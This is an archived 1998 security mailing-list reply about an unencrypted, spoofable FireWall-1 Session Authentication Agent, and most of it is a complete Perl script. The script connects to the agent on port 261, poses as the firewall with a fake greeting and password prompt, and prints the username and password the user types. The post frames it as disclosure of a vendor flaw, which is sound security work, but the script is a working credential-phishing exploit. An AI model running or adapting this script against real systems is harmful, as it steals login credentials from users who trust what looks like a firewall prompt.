On Fri, 25 Sep 1998, Brooke Paul wrote: > > -----Original Message----- > > From: Larry Pingree [SMTP:larryp@secure-it.net] > > > > A problem exists in the Firewall-1 3.0b Session Agent > > > > All communications from the Firewall-1 Module to the session agent are > > non-encrypted. Thus also allowing these communication to be snooped for > > usernames and passwords. > > I think it's worth noting that Checkpoint states that the included > Session Agent is a 'demo' and not officially supported. The real problem > is the protocol they have defined. Even if you attempt to write a secure > version it wouldn't interoperate with the firewall. Where is that stated? I was unable to find any documentation stating that the Authentication Agent is a demo. I'd be surprised if they advertised Session Auth as a feature yet claimed that their Agent wasn't supported... Here's the script that Larry referred to. I whipped it up during his FW-1 class, of all places... :) ---------- SNIP ---------- #!/usr/bin/perl -w # # This script connects to a FireWall-1 Session Authentication Agent # running on Windows 95/NT. It attempts to "authenticate" the remote # user and returns the resulting username/password. # # The agent supports configuration of up to three IP addresses which # are allowed to submit authentication requests. If there are three # addresses configured, the user is presented with the following when # an unknown host connects: # # "Authentication request from this IP Address is not allowed." # [ OK ] # # If there are only one or two addresses allowed, the user gets this # nice little dialog box: # # "Do you want to enter this IP to the Firewall-1 list" # [ YES ] (default) [ NO ] # # Guess which button your typical user will click on? # # If the agent closes the connection prematurely, you will get strange # results. # # tested vs. FW-1 Authentication Agent 1.1 # # Andrew Danforth <acdat_private> require 5.000; use Socket; use Getopt::Std; $| = 1; $FIREWALL_NAME = "Corporate Firewall"; $PASSWORD_PROMPT = "FireWall-1 password"; $PORT = 261; die unless getopts('n:p:'); unless ($TARGET_IP = shift) { print "usage: $0 [-n firewall_name] [-p password_prompt] target_ip\n"; exit(1); } $FIREWALL_NAME = $opt_n if (defined $opt_n); $PASSWORD_PROMPT = $opt_p if (defined $opt_p); socket(SOCK, AF_INET, SOCK_STREAM, getprotobyname('tcp')) || die "socket: $!"; connect(SOCK, sockaddr_in($PORT, inet_aton($TARGET_IP))) || die "connect: $!"; select(SOCK); $| = 1; select(STDOUT); print SOCK "220 FW-1 Session Authentication Request from $FIREWALL_NAME\n\r"; print "sent greeting\n"; print SOCK "331 User:\n\r"; print "sent user request\n"; $username = &get_response; print "username entered: $username\n"; print SOCK "331 *$PASSWORD_PROMPT:\n\r"; $password = &get_response; print "password entered: $password\n"; print SOCK "200 User $username authenticated by FireWall-1 authentication.\n\r"; print SOCK "230 OK\n\r"; sub get_response { # this is ugly but it works. the session agent doesn't seem to send proper newlines. my $input; $input .= $key while($key = getc SOCK and ord($key)); return $input; }
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:17:45 PDT